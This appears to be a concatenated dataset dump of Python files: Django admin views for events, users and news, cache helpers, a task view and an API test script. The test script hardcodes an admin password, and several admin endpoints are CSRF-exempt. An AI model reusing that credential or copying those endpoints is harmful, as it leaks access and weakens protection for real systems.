settings.APP_ID,\n# settings.APNS_CERTIFICATE_LOCATION)\n\n# def send_notifications(message):\n# \tfor token in DeviceToken.objects.all():\n# \t\tpyapns_wrapper.notify(token.token, message)\n\ndef site_admin_only(function):\n\tdef _inner(request, *args, **kwargs):\n\t\tif request.user.is_authenticated():\n\t\t\tif not request.user.is_site_admin or not request.user.is_admin:\n\t\t\t\treturn HttpResponseRedirect('/') \n\t\t\treturn function(request, *args, **kwargs)\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/')\n\treturn _inner\n\n\n@site_admin_only\ndef index_adminka(request, template_name='adminka/index.html'):\n\treturn render_to_response(template_name, context_instance=RequestContext(request))\n\n@site_admin_only\ndef all_events(request, type_events, template_name='adminka/events/events.html'):\n\tif type_events == \"no_complete\":\n\t\tall_events = Event.objects.filter(is_removed=False).filter(is_completed=False).order_by('-date_create')\n\telif type_events == \"complete\":\n\t\tall_events = Event.objects.filter(is_removed=False).filter(is_completed=True).order_by('-date_create')\n\telif type_events == \"curent_month\":\n\t\tnow = datetime.datetime.now()\n\t\tall_events = Event.objects.filter(is_removed=False).filter(start_date__year=now.year, start_date__month=now.month).order_by('-date_create')\n\telse:\n\t\tall_events = Event.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_events\":all_events}, context_instance=RequestContext(request))\n\n@site_admin_only\ndef event(request, id, template_name='adminka/events/event.html'):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = EventForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\tstart_date\t= form.cleaned_data['start_date']\n\t\t\tplace \t\t= form.cleaned_data['place']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\tis_completed = form.cleaned_data['is_completed']\n\t\t\tgroup_id\t= form.cleaned_data['group_id']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tevent.material.logo = logo\n\t\t\tif is_completed:\n\t\t\t\tevent.is_completed = True\n\t\t\telse:\n\t\t\t\tevent.is_completed = False\n\n\t\t\ttry:\n\t\t\t\tgroup_id = EventsGroup.objects.get(id=group_id)\n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\traise Http404\n\n\t\t\tevent.material.title = title\n\t\t\tevent.start_date = start_date\n\t\t\tevent.end_date = start_date\n\t\t\tevent.place = place\n\t\t\tevent.material.text = text\n\t\t\tevent.event_group = group_id\n\n\t\t\tevent.material.save()\n\t\t\tevent.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\telse:\t\n\t\tform = EventForm()\n\tgroups = EventsGroup.objects.all()\n\treturn render_to_response(template_name, {\"event\":event, \"form\":form, \"groups\":groups}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef subscribe_events(request, id, template_name='adminka/events/subscribe_events.html'):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\treturn render_to_response(template_name, {\"event\":event}, context_instance=RequestContext(request))\n\n@site_admin_only\ndef event_add(request, template_name='adminka/events/add_events.html'):\n\tif request.method == 'POST':\n\t\tform = EventForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\tstart_date\t= form.cleaned_data['start_date']\n\t\t\tplace \t\t= form.cleaned_data['place']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\tis_completed = form.cleaned_data['is_completed']\n\t\t\tgroup_id\t= form.cleaned_data['group_id']\n\n\t\t\tif is_completed:\n\t\t\t\tis_completed = True\n\t\t\telse:\n\t\t\t\tis_completed = False\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\ttry:\n\t\t\t\tgroup_id = EventsGroup.objects.get(id=group_id)\n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\traise Http404\n\n\t\t\tevent = Event.objects.create(material=material, start_date = start_date, end_date = start_date, \n\t\t\t\t\tplace = place, is_completed=is_completed, event_group=group_id) \n\t\t\t\n\t\t\t\n\t\t\t# events_string = str(event_date.day).rjust(2, '0')+\".\"+str(event_date.month).rjust(2, '0')+\".\"+str(event_date.year)+u\" в \"+str(event_date.hour).rjust(2, '0')+\":\"+str(event_date.minute).rjust(2, '0')+u\" состоится '\" +event.get_title()+\"'\"\n\t\t\t# # push_data = {\"aps\":{\"alert\":events_string}}\n\t\t\t# # send_notifications(push_data)\n\t\t\tevent_date = event.get_start_date_time()\n\t\t\tevents_string = u\"Добавлено мероприятие. \\n\"+str(event_date.day).rjust(2, '0')+\".\"+str(event_date.month).rjust(2, '0')+\".\"+str(event_date.year)+u\" в \"+str(event_date.hour).rjust(2, '0')+\":\"+str(event_date.minute).rjust(2, '0')+u\" состоится '\" +event.get_title()+\"'\"\n\t\t\tn1 = push.Notification(events_string, data='{\"window_open\":\"2\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.start_datef = request.POST.get('start_date')\n\t\t\tform.placef = request.POST.get('place')\n\t\t\tform.textf = request.POST.get('text')\n\t\t\tform.is_completedf = request.POST.get('is_completed')\n\t\t\tif request.POST.get('group_id'):\n\t\t\t\tform.group_idf = int(request.POST.get('group_id'))\n\telse:\t\n\t\tform = EventForm()\n\tgroups = EventsGroup.objects.all()\n\treturn render_to_response(template_name, {\"form\":form, \"groups\":groups}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef remove_events(request, id):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\t\tevent.is_removed = True\n\t\tevent.save()\n\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\n@site_admin_only\ndef all_users(request, type_users, template_name='adminka/users/users.html'):\n\tif type_users == \"active\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_active=True)\n\telif type_users == \"noactive\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_active=False)\n\telif type_users == \"visible\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=True)\n\telif type_users == \"novisible\":\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=False)\n\telif type_users == \"online\":\n\t\t# uids = cache.get('online-now', [])\n\t # online_keys = ['online-%s' % (u,) for u in uids]\n\t # fresh = cache.get_many(online_keys).keys()\n\t # online_now_ids = [int(k.replace('online-', '')) for k in fresh]\n\t\tall_users = Player.objects.filter(is_active=True).filter(life__user_visible=False).filter(id in online_now_ids)\n\telse:\n\t\tall_users = Player.objects.filter(is_active=True)\n\treturn render_to_response(template_name, {\"all_users\":all_users}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef user(request, id, template_name='adminka/users/user.html'):\n\ttry:\n\t\tplayer = Player.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\treturn render_to_response(template_name, {\"player\":player}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef user_activity(request, id):\n\tif request.method == 'POST':\n\t\tform = ActivityForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tstart_active = form.cleaned_data['start_active']\n\t\t\tend_active = form.cleaned_data['end_active']\n\t\t\tif start_active > end_active:\n\t\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":2})\n\t\t\telif start_active == end_active:\n\t\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":3})\n\t\t\telif end_active < timezone.now():\n\t\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":4})\n\t\t\telse:\n\t\t\t\tuser = Player.objects.get(id=int(id))\n\t\t\t\tuser.life.start_active = start_active\n\t\t\t\tuser.life.end_active = end_active\n\t\t\t\tuser.life.user_active = True\n\t\t\t\tuser.life.save()\n\t\t\t\ttable_data = simplejson.dumps({\"status\": True, \"start_active\":str(start_active), \"end_active\":str(end_active)})\n\t\telse:\n\t\t\ttable_data = simplejson.dumps({\"status\": False, \"system_message\":1})\n\n\t\treturn HttpResponse(table_data,'application/json')\n\telse:\n\t\traise Http404\n\n@csrf_exempt\n@site_admin_only\ndef user_visible(request, id):\n\tif request.method == 'POST':\n\t\ttry:\n\t\t\tuser = Player.objects.get(id=int(id))\n\t\t\tif user.life.user_visible:\n\t\t\t\tuser.life.user_visible = False\n\t\t\telse:\n\t\t\t\tuser.life.user_visible = True\n\t\t\tuser.life.save()\n\t\texcept ObjectDoesNotExist:\n\t\t\traise Http404\n\n\t\ttable_data = simplejson.dumps({\"status\": False})\n\t\treturn HttpResponse(table_data,'application/json')\n\telse:\n\t\traise Http404\n\n\n\n@site_admin_only\ndef all_news(request, template_name='adminka/news/news.html'):\n\tall_news = News.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_news\":all_news}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef news_add(request, template_name='adminka/news/add.html'):\n\tif request.method == 'POST':\n\t\tform = NewsForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\tnews = News.objects.create(material=material) \n\t\t\t\n\t\t\t# import pyapns\n\t\t\t# pyapns.configure({'HOST': 'http://localhost:7077/'})\n\t\t\t# pyapns.provision('com.axbx.theriver', open('/home/srv/www/sert/apns-dev.pem').read(), 'sandbox')\n\t\t\t# message = {\"aps\":{\"alert\":\"test\"}}\n\t\t\t# pyapns.notify('com.axbx.theriver', \"0980caa5fbeb6f008f7edbec69bf533516737b4c21f9354e500672f59a47470a\", message)\n\n\t\t\tnews_string = u\"Добавлена новость. \\n\"+news.get_title()\n\n\t\t\tn1 = push.Notification(news_string, data='{\"window_open\":\"1\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.textf = request.POST.get('text')\n\telse:\t\n\t\tform = NewsForm()\n\treturn render_to_response(template_name, {\"form\":form}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef news(request, id, template_name='adminka/news/news_page.html'):\n\ttry:\n\t\tnews = News.objects.get(id=int(id), is_removed=False)\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = NewsForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tnews.material.logo = logo\n\n\t\t\tnews.material.title = title\n\t\t\tnews.material.text = text\n\t\t\tnews.date_create = datetime.datetime.now()\n\t\t\tnews.material.save()\n\t\t\tnews.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\telse:\t\n\t\tform = NewsForm()\n\treturn render_to_response(template_name, {\"news\":news, \"form\":form}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef remove_news(request, id):\n\ttry:\n\t\tnews = News.objects.get(id=int(id))\n\t\tnews.is_removed = True\n\t\tnews.save()\n\t\treturn HttpResponseRedirect(\"/adminka/news/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n\n@site_admin_only\ndef all_bd(request, template_name='adminka/bd/bd_list.html'):\n\tall_bd = KnowledgeBaseTheRiver.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_bd\":all_bd}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef bd_add(request, template_name='adminka/bd/add.html'):\n\tif request.method == 'POST':\n\t\tform = BDForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\ttags_id = form.cleaned_data['tags_id']\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, like_group=like)\n\t\t\telse:\n\t\t\t\tmaterial = Materials.objects.create(title=title, text=text, player=request.user, like_group=like)\n\t\t\t\n\t\t\tbd = KnowledgeBaseTheRiver.objects.create(material=material) \n\n\t\t\tif tags_id:\n\t\t\t\tbd.remove_all_tag()\n\t\t\t\ttags_id = tags_id.split(\",\")\n\n\t\t\t\tfor i_id in tags_id:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i_id:\n\t\t\t\t\t\t\ttag = BD_Tag.objects.get(id=i_id)\n\t\t\t\t\t\t\tbd.tags.add(tag)\n\t\t\t\t\texcept ObjectDoesNotExist:\n\t\t\t\t\t\traise Http404\n\t\t\tbd.save()\n\t\t\tbd_string = u\"Добавлено новое знание. \\n\"+bd.get_title()\n\t\t\tn1 = push.Notification(bd_string, data='{\"window_open\":\"3\"}')\n\t\t\tpush.push([n1])\n\n\t\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\t\telse:\n\t\t\tform.titlef = request.POST.get('title')\n\t\t\tform.textf = request.POST.get('text')\n\t\t\tform.tags_idf = request.POST.get('tags_id')\n\telse:\t\n\t\tform = BDForm()\n\treturn render_to_response(template_name, {\"form\":form}, context_instance=RequestContext(request))\n\n\n\n@site_admin_only\ndef bd(request, id, template_name='adminka/bd/bd_page.html'):\n\ttry:\n\t\tbd = KnowledgeBaseTheRiver.objects.get(id=int(id), is_removed=False)\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = BDForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\ttags_id = form.cleaned_data['tags_id']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tbd.material.logo = logo\t\t\t\n\n\t\t\tbd.material.title = title\n\t\t\tbd.material.text = text\n\t\t\tbd.date_create = datetime.datetime.now()\n\t\t\tbd.material.save()\n\t\t\tbd.save()\n\n\t\t\tif tags_id:\n\t\t\t\tbd.remove_all_tag()\n\t\t\t\ttags_id = tags_id.split(\",\")\n\n\t\t\t\tfor i_id in tags_id:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif i_id:\n\t\t\t\t\t\t\ttag = BD_Tag.objects.get(id=i_id)\n\t\t\t\t\t\t\tbd.tags.add(tag)\n\t\t\t\t\texcept ObjectDoesNotExist:\n\t\t\t\t\t\traise Http404\n\t\t\tbd.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\telse:\t\n\t\tform = BDForm()\n\treturn render_to_response(template_name, {\"form\":form, \"bd\":bd}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef remove_bd(request, id):\n\ttry:\n\t\tbd = KnowledgeBaseTheRiver.objects.get(id=int(id))\n\t\tbd.is_removed = True\n\t\tbd.save()\n\t\treturn HttpResponseRedirect(\"/adminka/bd/\")\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\n@csrf_exempt\n@site_admin_only\ndef add_bd_tag(request):\n\ttry:\n\t\tplayer = request.user\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = AddTagForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\ttags = form.cleaned_data['tags'].strip()\n\t\t\ttry:\n\t\t\t\ttag = BD_Tag.objects.get(name__iexact=tags) \n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\trating = Rating.objects.create(curent_value=0)\n\t\t\t\ttag = BD_Tag.objects.create(name=tags, rating=rating)\n\t\t\ttable_data = simplejson.dumps(\n\t\t\t\t{\n\t\t\t\t\t\"id\": tag.id, \"name\":tag.name\n\t\t\t\t}, ensure_ascii=False)\n\t\t\treturn HttpResponse(table_data,'application/json')\n\traise Http404\n\n\n#автозаполнение\n@csrf_exempt\n@site_admin_only\ndef autocomplete_bd_tag(request):\n if request.is_ajax():\n if request.method == 'POST':\n tag \t= request.POST.get('query')\n\n if tag:\n tags = BD_Tag.objects.filter(name__istartswith=tag).order_by('-rating')\n else:\n tags = BD_Tag.objects.all()\n\n tags = tags[:int(request.REQUEST.get('limit', 15))]\n table_data = simplejson.dumps(\n {\n \"query\": \"Unit\",\n \"suggestions\": [ {\"value\":tag.name, \"data\":tag.name} for tag in tags]\n }, ensure_ascii=False)\n return HttpResponse(table_data,'application/json')\n raise Http404","sub_path":"adminka/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422219150","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('empleados/', views.empleados, name='empleados'),\n path('empleados/set', views.crearEmpleado, name='crearEmpleado'),\n path('cargos', views.cargos, name='cargos')\n]\n \n","sub_path":"semana5/dia2/pcapi/equipos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595887668","text":"# -*- coding:utf-8 -*-\n\nimport six\nif six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n\nfrom api.extensions import cache\nfrom api.models.cmdb import Attribute\nfrom api.models.cmdb import CIType\nfrom api.models.cmdb import CITypeAttribute\nfrom api.models.cmdb import RelationType\n\n\nclass AttributeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n attr = cache.get('Field::Name::{0}'.format(key)) \\\n or cache.get('Field::ID::{0}'.format(key)) \\\n or cache.get('Field::Alias::{0}'.format(key))\n\n if attr is None:\n attr = Attribute.get_by(name=key, first=True, to_dict=False) \\\n or Attribute.get_by_id(key) \\\n or Attribute.get_by(alias=key, first=True, to_dict=False)\n if attr is not None:\n cls.set(attr)\n return attr\n\n @classmethod\n def set(cls, attr):\n cache.set('Field::ID::{0}'.format(attr.id), attr)\n cache.set('Field::Name::{0}'.format(attr.name), attr)\n cache.set('Field::Alias::{0}'.format(attr.alias), attr)\n\n @classmethod\n def clean(cls, attr):\n cache.delete('Field::ID::{0}'.format(attr.id))\n cache.delete('Field::Name::{0}'.format(attr.name))\n cache.delete('Field::Alias::{0}'.format(attr.alias))\n\n\nclass CITypeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n ct = cache.get(\"CIType::ID::{0}\".format(key)) or \\\n cache.get(\"CIType::Name::{0}\".format(key)) or \\\n cache.get(\"CIType::Alias::{0}\".format(key))\n if ct is None:\n ct = CIType.get_by(name=key, first=True, to_dict=False) or \\\n CIType.get_by_id(key) or \\\n CIType.get_by(alias=key, first=True, to_dict=False)\n if ct is not None:\n cls.set(ct)\n return ct\n\n @classmethod\n def set(cls, ct):\n cache.set(\"CIType::Name::{0}\".format(ct.name), ct)\n cache.set(\"CIType::ID::{0}\".format(ct.id), ct)\n cache.set(\"CIType::Alias::{0}\".format(ct.alias), ct)\n\n @classmethod\n def clean(cls, key):\n ct = cls.get(key)\n if ct is not None:\n cache.delete(\"CIType::Name::{0}\".format(ct.name))\n cache.delete(\"CIType::ID::{0}\".format(ct.id))\n cache.delete(\"CIType::Alias::{0}\".format(ct.alias))\n\n\nclass RelationTypeCache(object):\n @classmethod\n def get(cls, key):\n if key is None:\n return\n ct = cache.get(\"RelationType::ID::{0}\".format(key)) or \\\n cache.get(\"RelationType::Name::{0}\".format(key))\n if ct is None:\n ct = RelationType.get_by(name=key, first=True, to_dict=False) or RelationType.get_by_id(key)\n if ct is not None:\n cls.set(ct)\n return ct\n\n @classmethod\n def set(cls, ct):\n cache.set(\"RelationType::Name::{0}\".format(ct.name), ct)\n cache.set(\"RelationType::ID::{0}\".format(ct.id), ct)\n\n @classmethod\n def clean(cls, key):\n ct = cls.get(key)\n if ct is not None:\n cache.delete(\"RelationType::Name::{0}\".format(ct.name))\n cache.delete(\"RelationType::ID::{0}\".format(ct.id))\n\n\nclass CITypeAttributeCache(object):\n \"\"\"\n key is type_id or type_name\n \"\"\"\n\n @classmethod\n def get(cls, key):\n if key is None:\n return\n\n attrs = cache.get(\"CITypeAttribute::Name::{0}\".format(key)) \\\n or cache.get(\"CITypeAttribute::ID::{0}\".format(key))\n if not attrs:\n attrs = CITypeAttribute.get_by(type_id=key, to_dict=False)\n if not attrs:\n ci_type = CIType.get_by(name=key, first=True, to_dict=False)\n if ci_type is not None:\n attrs = CITypeAttribute.get_by(type_id=ci_type.id, to_dict=False)\n if attrs is not None:\n cls.set(key, attrs)\n return attrs\n\n @classmethod\n def set(cls, key, values):\n ci_type = CITypeCache.get(key)\n if ci_type is not None:\n cache.set(\"CITypeAttribute::ID::{0}\".format(ci_type.id), values)\n cache.set(\"CITypeAttribute::Name::{0}\".format(ci_type.name), values)\n\n @classmethod\n def clean(cls, key):\n ci_type = CITypeCache.get(key)\n attrs = cls.get(key)\n if attrs is not None and ci_type:\n cache.delete(\"CITypeAttribute::ID::{0}\".format(ci_type.id))\n cache.delete(\"CITypeAttribute::Name::{0}\".format(ci_type.name))\n","sub_path":"api/lib/cmdb/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"165434399","text":"import requests\nimport os\nimport json\n\n\n#check if API is working\ntest_response = requests.get('http://localhost:5090/api/test')\nprint(test_response.json())\n#Get token with admin auth\ntoken_response = requests.get('http://localhost:5090/api/tokens', auth=('admin', 'caMx2mwuGeWA'))\nprint(token_response.json())\ntoken_json = token_response.json()\ntoken = token_response.json()['token']\nprint(token)\n#add token to headers\nheaders = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token}\n# get BP with test_upw\ntest_upw_data_file_path = os.getcwd() + '/data.json'\nwith open(test_upw_data_file_path, 'r') as data_file:\n data = json.load(data_file)\n print(data)\n get_bp_response = requests.get('http://localhost:5090/api/get_bp', headers=headers, json=data)\n print(get_bp_response.json())\n\n#create new database\n#check for db_list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\ndb_json = {\"db_name\": \"123\"}\ncreate_db_response = requests.put('http://localhost:5090/api/databases', headers=headers, json=db_json)\n#check for new db in list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\n#delete new db from list\ndb_list_response = requests.delete('http://localhost:5090/api/databases', headers=headers, json=db_json)\nprint(db_list_response.json())\n#check for new db not in list\ndb_list_response = requests.get('http://localhost:5090/api/databases', headers=headers)\nprint(db_list_response.json())\n\n#check for upw_list from db 4994\ndb_json_4994 = {\"db_name\": \"4994\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json_4994)\nprint(upw_list_response.json())\n#get with upw_arrays\ndb_json_4994 = {\"db_name\": \"5391\", \"upw_arrays\": \"get_upw_arrays\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json_4994)\nprint(upw_list_response.json())\n#try to get upws from non existed db\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n#try to get upws from non existed db with upw_arrays\ndb_json = {\"db_name\": \"123\", \"upw_arrays\": \"get_upw_arrays\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n\n#work with upw in database 4994\nupw_json_4994 = {\"db_name\": \"4994\", \"cid\": \"47529\"}\nupw_list_response = requests.get('http://localhost:5090/api/upw', headers=headers, json=upw_json_4994)\nprint(upw_list_response.json())\n#put new upw in database\nupw_file_path = os.getcwd() + '/data2.json'\nwith open(upw_file_path, 'r') as upw_file:\n upw_json = json.load(upw_file)\n upw_list_response = requests.put('http://localhost:5090/api/upw', headers=headers, json=upw_json)\n print(upw_list_response.json())\n#Check upw added\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n#delete added upw\ndelete_upw_json = {\"db_name\": \"123\", \"cid\": \"1\"}\nupw_list_response = requests.delete('http://localhost:5090/api/upw', headers=headers, json=delete_upw_json)\nprint(upw_list_response.json())\n#Check upw deleted\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n\n#revoke token\nupw_list_response = requests.delete('http://localhost:5090/api/tokens', headers=headers)\nprint(upw_list_response.content)\n\n#try to use API after revoke\ndb_json = {\"db_name\": \"123\"}\nupw_list_response = requests.get('http://localhost:5090/api/upws', headers=headers, json=db_json)\nprint(upw_list_response.json())\n","sub_path":"app/tests/token_api_test.py","file_name":"token_api_test.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92853244","text":"\"\"\"\nビュークラス\nV080_TaskDetail\nトップページ用View\nエラーフラグ:0(正常終了),1(業務エラー),2(システムエラー)\nflg_return:0(render),1(redirect)\n\nflg_return==0の時、「template」「context」必須\nflg_return==1の時、「path_name」必須\n\n\"\"\"\n\nfrom django.urls import reverse\nfrom . import (C010_Const,C030_MessageUtil,\n S006_GetKeibaNews,\n S130_SelectTask,\n S900_SelectHanyoMst,\n)\n\ndef main(request,urlID,seq):\n #--View共通----------------------------------------------\n #戻り値用の変数宣言\n flg_return = \"\"\n template = ''\n context = {}\n path_name = ''\n #-------------------------------------------------------\n try:\n if request.method == 'POST':\n #POSTの場合\n \"\"\"\n POST時の処理を書く。\n パターンに応じてflg_returnの値を設定する。\n bottunパターンによって処理を分けたりもするかも。\n 例は、redirect\n \"\"\"\n flg_return = \"1\"\n path_name = C010_Const.APP_NAME_DEFAULT + ':topPage'\n else:\n #POST以外の場合\n \"\"\"\n POST以外時の処理を書く。\n パターンに応じてflg_returnの値を設定する。\n bottunパターンによって処理を分けたりもするかも。\n 例は、render\n \"\"\"\n #サービスを利用する場合は呼び出す\n #プロジェクト情報を取得する\n projectID = request.session[\"projectID\"]\n\n #プロジェクトに紐づくタスクの一覧を取得する\n #--S140-------------------------------------------------------------------------\n #サービス呼び出し\n json_S130 = S130_SelectTask.main(projectID,seq)\n #個々の値を取得\n flg_S130 = json_S130[\"json_CommonInfo\"][\"errflg\"]\n list_msgInfo_S130 = json_S130[\"json_CommonInfo\"][\"list_msgInfo\"]\n json_taskInfo_S130 = json_S130[\"json_taskInfo\"]\n #メッセージ格納\n C030_MessageUtil.setMessageList(request,list_msgInfo_S130)\n #-------------------------------------------------------------------------------\n\n #date型の型変換\n kignDate = json_taskInfo_S130[\"KIGN_DATE\"]\n json_taskInfo_S130[\"KIGN_DATE\"] = format(kignDate, '%Y-%m-%d')\n\n #--S006-------------------------------------------------------------------------\n #サービス呼び出し\n #最新ニュース取得\n json_keibaInfo = S006_GetKeibaNews.main(0)\n #ドロップダウンの値取得\n tuple_status = S900_SelectHanyoMst.main(\"SEC0001\",None)[\"tuple_M101_hanyoMst\"]\n #-------------------------------------------------------------------------------\n\n #戻り値にセット\n flg_return = \"0\"\n template = C010_Const.APP_NAME_DEFAULT + '/T080_TaskDetail.html'\n context = {**context,**{\n \"json_taskInfo_S130\":json_taskInfo_S130,\n \"json_keibaInfo\":json_keibaInfo,\n \"tuple_status\":tuple_status\n }\n }\n \n #戻り値用のjsonを作成\n json_view = {'flg_return':flg_return, 'template':template, 'context':context, 'path_name':path_name}\n return json_view\n #==例外処理==========================================================================================\n except Exception as e :\n #システムエラー共通処理\n C030_MessageUtil.systemErrorCommonMethod()\n raise\n #====================================================================================================\n\n","sub_path":"app001_projectManagement/process/V080_TaskDetail.py","file_name":"V080_TaskDetail.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449101867","text":"#!/usr/bin/env python\n\"\"\"\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an 